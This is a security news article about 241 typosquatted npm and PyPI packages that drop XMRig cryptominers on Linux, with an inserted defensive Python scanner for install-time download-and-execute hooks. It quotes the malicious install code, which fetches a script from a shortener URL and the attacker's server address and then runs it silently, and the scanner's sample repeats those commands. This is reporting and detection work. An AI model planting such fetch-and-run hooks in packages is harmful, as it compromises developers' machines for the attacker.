241 npm and PyPI packages caught dropping Linux cryptominers

More than 200 malicious packages have been discovered infiltrating the PyPI and npm open source registries this week.

These packages are largely typosquats of widely used libraries, and each of them downloads a Bash script onto Linux systems that runs cryptominers.

PyPI, npm flooded with cryptomining packages

Researchers have caught at least 241 malicious npm and PyPI packages that drop cryptominers after infecting Linux machines.

These packages are typosquats of popular open source libraries and commands such as React, argparse, and AIOHTTP, but instead of providing the expected functionality they download and install cryptomining Bash scripts from the threat actor’s server.

On Wednesday, software developer and researcher Hauke Lübbers shared coming across “at least 33 projects” on PyPI that all launched XMRig, an open source Monero cryptominer, after infecting a system.


55 typosquats laced with cryptominers flood PyPI (Hauke Lübbers)

While the researcher was in the process of reporting these 33 malicious projects to PyPI admins, he noticed the threat actor began publishing another set of 22 packages with the same malicious payload.

“After I reported them to PyPI, they were quickly deleted – but the malicious actor was still in the process of uploading more packages, and uploaded another 22,” Lübbers tells BleepingComputer.

“The packages targeted Linux systems and installed crypto mining software XMRig,” explains the software engineer.

The Python packages contain the following piece of code, which downloads the Bash script from the threat actor’s server via the Bit.ly URL shortener.

os.system("sudo wget https://bit[.]ly/3c2tMTT -O ./.cmc -L >/dev/null 2>&1")  # fetch the script into a hidden file, silently
os.system("chmod +x .cmc >/dev/null 2>&1")                                    # make it executable
os.system("./.cmc >/dev/null 2>&1")                                           # run it, discarding all output
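The pattern above (a typosquatted name plus an install-time shell call that fetches, chmods and runs a hidden file) is something a defender can check for mechanically. The Python script below is an added example, not code from the article, from Lübbers, or from Sonatype: it walks a package's setup.py through the `ast` module looking for shell calls whose literal command resembles a download-and-execute chain, and separately flags a package name that is nearly, but not exactly, a popular one. The sample setup.py, the popular-package list and the shortener URL inside it are constructed placeholders.

```python
"""Defender-side checks for the two traits this campaign relies on:
a typosquatted package name and an install-time hook that downloads
and executes a script. Added example; the sample setup.py below is
constructed and its URL is a placeholder, not the real one."""
import ast
import re
from difflib import SequenceMatcher

# Shell fragments seen in download-and-execute install hooks: a downloader,
# chmod +x, a URL shortener, a hidden dot-file in the working directory,
# or output being thrown away.
SUSPICIOUS_SHELL = re.compile(
    r"\b(wget|curl)\s|chmod\s+\+x|bit\[?\.\]?ly|\./\.\w+|>\s*/dev/null", re.I)

# (module, attribute) pairs that hand a string to a shell or spawn a process.
SHELL_CALLS = {
    ("os", "system"), ("os", "popen"),
    ("subprocess", "run"), ("subprocess", "call"),
    ("subprocess", "Popen"), ("subprocess", "check_output"),
}


def _literal_commands(call):
    """Literal string arguments of a call; a list/tuple argument such as
    subprocess.run(["wget", url]) is joined into one command string."""
    cmds = []
    for arg in call.args:
        if isinstance(arg, ast.Constant) and isinstance(arg.value, str):
            cmds.append(arg.value)
        elif isinstance(arg, (ast.List, ast.Tuple)):
            parts = [e.value for e in arg.elts
                     if isinstance(e, ast.Constant) and isinstance(e.value, str)]
            if parts:
                cmds.append(" ".join(parts))
    return cmds


def find_download_exec_calls(source):
    """Return (line, callee, command) for every shell call in `source`
    whose literal command matches SUSPICIOUS_SHELL."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        if not (isinstance(func, ast.Attribute)
                and isinstance(func.value, ast.Name)):
            continue
        callee = (func.value.id, func.attr)
        if callee not in SHELL_CALLS:
            continue
        for cmd in _literal_commands(node):
            if SUSPICIOUS_SHELL.search(cmd):
                hits.append((node.lineno, ".".join(callee), cmd))
    return hits


def typosquat_candidates(name, popular, threshold=0.8):
    """Popular package names that `name` closely resembles without being an
    exact match, as (popular_name, similarity) sorted by similarity."""
    name = name.lower()
    out = []
    for p in popular:
        if p.lower() == name:
            continue
        ratio = SequenceMatcher(None, name, p.lower()).ratio()
        if ratio >= threshold:
            out.append((p, round(ratio, 2)))
    return sorted(out, key=lambda t: -t[1])


# Constructed setup.py modelled on the snippet quoted in the article;
# the shortener URL is a placeholder. The "echo" line is benign filler
# that the scanner should leave alone.
SAMPLE_SETUP_PY = '''
import os
from setuptools import setup
os.system("sudo wget https://bit[.]ly/PLACEHOLDER -O ./.cmc -L >/dev/null 2>&1")
os.system("chmod +x .cmc >/dev/null 2>&1")
os.system("./.cmc >/dev/null 2>&1")
os.system("echo building")
setup(name="aiohtp", version="0.0.1")
'''

# Constructed list; a real deployment would use the registry's own top-N.
POPULAR_PACKAGES = ["aiohttp", "argparse", "requests", "react"]

if __name__ == "__main__":
    for lineno, callee, cmd in find_download_exec_calls(SAMPLE_SETUP_PY):
        print(f"line {lineno}: {callee}({cmd!r})")
    print("resembles:", typosquat_candidates("aiohtp", POPULAR_PACKAGES))
```

Run it against the constructed sample and it reports the three download, chmod and execute calls on lines 4 to 6 while ignoring the benign `echo`, and flags `aiohtp` as a near-match for `aiohttp`. The AST walk only sees string literals, so a hook that assembles its command from pieces or decodes it at runtime would slip past; treating any shell call at install time as a finding is the stricter policy.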

The researcher explains the Bit[.]ly URL redirects to the script hosted on 80.78.25[.]140:8000.

“This was done by downloading and executing the Bash script from http://80.78.25[.]140:8000/.cmc”

Upon execution, the script reports the IP address of the compromised host to the threat actor, along with whether the deployment of the cryptominers succeeded.

At the time of writing, we observed that the IP address was down, but BleepingComputer was able to obtain a copy of the script and can confirm the researcher’s claims:


Excerpt from Bash script installing cryptominers (BleepingComputer)

The Sonatype security research team that I’m a part of disclosed another 186 npm typosquatting packages today, all making contact with the same URL to download the malicious Bash script.


npm packages pull malicious code from the same URL (Sonatype)

It appears that both registries cleared the typosquats fairly quickly from their platforms before these could do more harm to developers.

Despite various security enhancements, such as mandating two-factor authentication for critical projects and introducing new features (like Python’s setuptools moving towards replacing setup.py), it seems the open source repositories’ race against threat actors is only getting more challenging.

Last week, software security company Checkmarx reported discovering a dozen malicious Python packages performing DDoS attacks on Counter-Strike servers.

Earlier this month, cybersecurity firm CheckPoint outed 10 malicious PyPI packages caught stealing developer credentials.

In July, ReversingLabs researchers disclosed a supply chain attack dubbed IconBurst that once again exploited typosquatting to infect developers.
